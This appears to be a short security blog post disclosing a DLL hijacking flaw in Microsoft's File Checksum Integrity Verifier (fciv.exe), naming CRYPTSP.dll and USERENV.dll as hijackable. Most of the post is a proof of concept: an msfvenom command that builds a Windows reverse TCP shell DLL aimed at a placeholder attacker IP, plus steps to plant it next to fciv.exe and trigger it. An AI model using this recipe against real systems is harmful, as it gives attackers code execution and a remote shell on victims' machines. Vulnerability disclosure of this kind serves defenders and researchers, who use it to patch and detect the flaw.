image

file checsum with a process fciv.exe will load and execute malicious Dynamic Link Libraries {DLL} while using the following vulnerable names : 

CRYPTSP.dll 
USERENV.dll

the process of exploitation occurs while placing these remade dll files in the same directory of FCIV . so if an attacker is able to place one of these Vulnerable DLL , the execution of file verification will load these malicious dll directly .

POC

  • Generate reverse shell tcp payload using msfvenom
msfvenom -p windows/shell_reverse_tcp LHOST=attackerip LPORT=4444 -f dll > /root/CRYPTSP.dll
  • Place DLL file on the same directory of fciv executable
  • execute fciv.exe with malicious dll file
fciv.exe CRYPTSP.dll
![](https://gblobscdn.gitbook.com/assets%2F-LeHFsaS3PCSmBgWrxfp%2F-LjCXxYLurV30oPVewBk%2F-LjCY5MkYYwNJmYb8NMi%2Ffciv.gif?alt=media&token=48f3b472-1e67-4fc0-baf0-59882446fc69)

Reference

http://hyp3rlinx.altervista.org/advisories/MICROSOFT-FILE-CHECKSUM-VERIFIER-v2.05-DLL-HIJACKING-ARBITRARY-CODE-EXECUTION.txt



Lawrence Amer
offensive security expert and founder of 0xsp security research and development (SRD), passionate about hacking and breaking stuff, coder and maintainer of 0xsp-mongoose RED, and many other open-source projects
CONTACT ME